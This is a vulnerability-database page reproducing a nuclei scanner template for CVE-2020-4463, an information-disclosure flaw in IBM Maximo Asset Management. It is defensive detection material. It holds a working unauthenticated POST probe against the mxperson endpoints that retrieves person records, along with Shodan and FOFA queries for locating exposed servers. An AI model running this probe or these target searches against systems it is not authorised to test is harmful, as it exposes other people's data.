Lucene search

K

IBM Maximo Asset Management Information Disclosure - XML External Entity Injection

🗓️ 07 Dec 2020 07:25:59Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

IBM Maximo Asset Management XML External Entity Injectio

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Related
Refs
Code
id: CVE-2020-4463

info:
  name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection
  author: dwisiswant0
  severity: high
  description: |
    IBM Maximo Asset Management is vulnerable to an
    XML external entity injection (XXE) attack when processing XML data.
    A remote attacker could exploit this vulnerability to expose
    sensitive information or consume memory resources.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information or a denial of service.
  remediation: |
    Apply the latest security patches or updates provided by IBM to mitigate the vulnerability.
  reference:
    - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
    - https://github.com/Ibonok/CVE-2020-4463
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
    - https://www.ibm.com/support/pages/node/6253953
    - https://nvd.nist.gov/vuln/detail/CVE-2020-4463
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
    cvss-score: 8.2
    cve-id: CVE-2020-4463
    cwe-id: CWE-611
    epss-score: 0.76538
    epss-percentile: 0.97916
    cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: ibm
    product: maximo_asset_management
    shodan-query: http.favicon.hash:-399298961
    fofa-query: icon_hash=-399298961
  tags: cve,cve2020,ibm,xxe,disclosure

http:
  - method: POST
    path:
      - "{{BaseURL}}/os/mxperson"
      - "{{BaseURL}}/meaweb/os/mxperson"

    body: |
      <?xml version='1.0' encoding='UTF-8'?>
      <max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
        <max:MXPERSONQuery></max:MXPERSONQuery>
      </max:QueryMXPERSON>

    headers:
      Content-Type: "application/xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "QueryMXPERSONResponse"
          - "MXPERSONSet"

      - type: word
        part: header
        words:
          - "application/xml"
# digest: 490a0046304402207076d2b0c379c15109ad109ecc0357ab0c3883551ce2b3be86091c16b4d92f1202206d63e8c80195088ce209cb3a940feef5847bb6e93dcd8fda5b1ad754d19d8a13:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo